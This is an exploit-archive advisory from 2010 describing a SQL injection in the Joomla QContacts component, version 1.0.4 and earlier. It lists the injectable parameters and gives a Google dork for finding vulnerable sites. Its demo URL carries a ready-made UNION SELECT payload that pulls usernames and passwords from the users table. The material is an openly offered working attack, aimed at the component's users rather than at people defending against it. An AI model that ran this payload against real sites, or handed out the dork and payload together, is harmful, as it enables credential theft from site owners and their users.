Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability
# Published : 2010-07-13
# Author : _mlk_
# Previous Title : Diferior CMS 8.03 Multiple CSRF Vulnerabilities
# Next Title : Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities

# Exploit Title: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability
# Date: 12, July 2010

# Author:  _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip
# Version: 1.0.4 and previous
# Tested on: all OS

# CVE : 0

# Code : here

Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability

#################################################################################################################


   [+] Discovered by : _mlk_ (Renan)

   [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs

   [+] Homepages :  http://code.google.com/p/bugsec/
                    http://botecounix.com.br/blog/
                    http://c0d3rs.wordpress.com/

   [+] Location : Porto Alegre - RS, Brasil
                         (or Brazil)

#################################################################################################################


      [-] Information

   [?] Script : QContacts

   [?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html

   [?] Versions Tested: 1.0.4 and previous

   [?] Dork/String :  "index.php?option=com_qcontacts" / "com_qcontacts"

   [?] Date :  12, July 2010


-----------------------------------------------------------------------------------------------------------------


      [*] Parameters vuls :

         Itemid
         id
         catid


-----------------------------------------------------------------------------------------------------------------


      [*] Example :

         http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
         http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]


-----------------------------------------------------------------------------------------------------------------


      [*] Demo :

         http://<server>/path/index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541
         +union+select+concat(id,0x3a,name,0x3a,username,0x3a,password)+from+cms01_users--


#################################################################################################################


    [~] Agradecimentos :

        Deus , Familiares , Amigos e Tricolor Gaúcho (Grêmio) .
        Em especial "i4k" ( alien o/ ) .


#################################################################################################################